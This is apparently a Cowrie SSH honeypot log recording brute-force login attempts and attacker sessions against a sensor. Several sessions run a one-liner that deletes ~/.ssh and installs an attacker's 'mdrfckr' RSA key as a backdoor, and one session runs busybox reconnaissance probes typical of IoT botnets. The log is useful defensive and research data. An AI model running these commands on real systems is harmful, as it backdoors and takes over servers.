{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:17.727183Z","src_ip":"12.156.67.18","session":"da8ae0167448"}
{"eventid":"cowrie.login.failed","username":"mother","password":"fucker","message":"login attempt [mother/fucker] failed","sensor":"my-vps","timestamp":"2025-08-28T11:43:17.994440Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:43:18.104237Z","src_ip":"12.156.67.18","session":"da8ae0167448"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.105126Z","src_ip":"12.156.67.18","session":"da8ae0167448"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.264401Z","src_ip":"12.156.67.18","session":"da8ae0167448"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.265318Z","src_ip":"12.156.67.18","session":"da8ae0167448"}
{"eventid":"cowrie.login.success","username":"root","password":"zlxx.","message":"login attempt [root/zlxx.] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.324944Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:43:18.344323Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.session.connect","src_ip":"12.156.67.18","src_port":54688,"dst_ip":"1.2.3.4","dst_port":22,"session":"e254c6e543c7","protocol":"ssh","message":"New connection: 12.156.67.18:54688 (1.2.3.4:22) [session: e254c6e543c7]","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.421689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.422544Z","src_ip":"12.156.67.18","session":"e254c6e543c7"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.432348Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.434284Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.435143Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.435953Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.437275Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.438146Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox MWKTV","message":"CMD: cat /proc/mounts; /bin/busybox MWKTV","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.530185Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.581173Z","src_ip":"12.156.67.18","session":"e254c6e543c7"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox MWKTV","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox MWKTV","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.624146Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45630,"dst_ip":"1.2.3.4","dst_port":22,"session":"8441e80dd7d1","protocol":"ssh","message":"New connection: 212.227.125.160:45630 (1.2.3.4:22) [session: 8441e80dd7d1]","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.703032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.704025Z","src_ip":"212.227.125.160","session":"8441e80dd7d1"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox MWKTV","message":"CMD: tftp; wget; /bin/busybox MWKTV","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.718766Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.806967Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.810619Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.866737Z","src_ip":"212.227.125.160","session":"8441e80dd7d1"}
{"eventid":"cowrie.command.input","input":"/bin/busybox MWKTV","message":"CMD: /bin/busybox MWKTV","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.908161Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.910833Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.911887Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.912808Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2f3db15d6947ae78aec5f5d3b66d38f206625f2ce4e44a149f5552892530fb02","size":3550,"shasum":"2f3db15d6947ae78aec5f5d3b66d38f206625f2ce4e44a149f5552892530fb02","duplicate":false,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/2f3db15d6947ae78aec5f5d3b66d38f206625f2ce4e44a149f5552892530fb02 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.914214Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.session.closed","duration":1.7284882068634033,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:18.918887Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:43:19.254869Z","src_ip":"12.156.67.18","session":"e254c6e543c7"}
{"eventid":"cowrie.login.failed","username":"guest","password":"qwerty","message":"login attempt [guest/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T11:43:19.507467Z","src_ip":"212.227.125.160","session":"8441e80dd7d1"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:20.415798Z","src_ip":"12.156.67.18","session":"e254c6e543c7"}
{"eventid":"cowrie.session.connect","src_ip":"12.156.67.18","src_port":54704,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7a8cd5e9f23","protocol":"ssh","message":"New connection: 12.156.67.18:54704 (1.2.3.4:22) [session: e7a8cd5e9f23]","sensor":"my-vps","timestamp":"2025-08-28T11:43:20.591089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:43:20.591776Z","src_ip":"12.156.67.18","session":"e7a8cd5e9f23"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:20.713768Z","src_ip":"212.227.125.160","session":"8441e80dd7d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:43:20.759910Z","src_ip":"12.156.67.18","session":"e7a8cd5e9f23"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:43:21.469731Z","src_ip":"12.156.67.18","session":"e7a8cd5e9f23"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:21.628309Z","src_ip":"12.156.67.18","session":"da8ae0167448"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:21.637680Z","src_ip":"12.156.67.18","session":"e7a8cd5e9f23"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":25133,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb790c7c59c0","protocol":"ssh","message":"New connection: 186.225.142.90:25133 (1.2.3.4:22) [session: cb790c7c59c0]","sensor":"my-vps","timestamp":"2025-08-28T11:43:39.170906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:43:39.484856Z","src_ip":"186.225.142.90","session":"cb790c7c59c0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T11:43:39.486934Z","src_ip":"186.225.142.90","session":"cb790c7c59c0"}
{"eventid":"cowrie.login.success","username":"root","password":"0r968ji9ufj6","message":"login attempt [root/0r968ji9ufj6] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:43:41.701199Z","src_ip":"186.225.142.90","session":"cb790c7c59c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:43:42.771349Z","src_ip":"186.225.142.90","session":"cb790c7c59c0"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-28T11:43:42.772021Z","src_ip":"186.225.142.90","session":"cb790c7c59c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:43.267915Z","src_ip":"186.225.142.90","session":"cb790c7c59c0"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:43.521169Z","src_ip":"186.225.142.90","session":"cb790c7c59c0"}
{"eventid":"cowrie.session.connect","src_ip":"192.227.168.133","src_port":44864,"dst_ip":"1.2.3.4","dst_port":22,"session":"002175b7be41","protocol":"ssh","message":"New connection: 192.227.168.133:44864 (1.2.3.4:22) [session: 002175b7be41]","sensor":"my-vps","timestamp":"2025-08-28T11:43:49.410018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:43:49.411029Z","src_ip":"192.227.168.133","session":"002175b7be41"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:43:49.585052Z","src_ip":"192.227.168.133","session":"002175b7be41"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd.2018","message":"login attempt [root/Pa$$w0rd.2018] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:43:50.321438Z","src_ip":"192.227.168.133","session":"002175b7be41"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:43:51.105240Z","src_ip":"192.227.168.133","session":"002175b7be41"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:43:51.105950Z","src_ip":"192.227.168.133","session":"002175b7be41"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:43:51.106778Z","src_ip":"192.227.168.133","session":"002175b7be41"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:51.281503Z","src_ip":"192.227.168.133","session":"002175b7be41"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:43:51.647161Z","src_ip":"192.227.168.133","session":"002175b7be41"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:43:51.647894Z","src_ip":"192.227.168.133","session":"002175b7be41"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:43:51.823604Z","src_ip":"192.227.168.133","session":"002175b7be41"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:51.824532Z","src_ip":"192.227.168.133","session":"002175b7be41"}
{"eventid":"cowrie.session.connect","src_ip":"192.227.168.133","src_port":44868,"dst_ip":"1.2.3.4","dst_port":22,"session":"aef36c784889","protocol":"ssh","message":"New connection: 192.227.168.133:44868 (1.2.3.4:22) [session: aef36c784889]","sensor":"my-vps","timestamp":"2025-08-28T11:43:51.992944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:43:51.993929Z","src_ip":"192.227.168.133","session":"aef36c784889"}
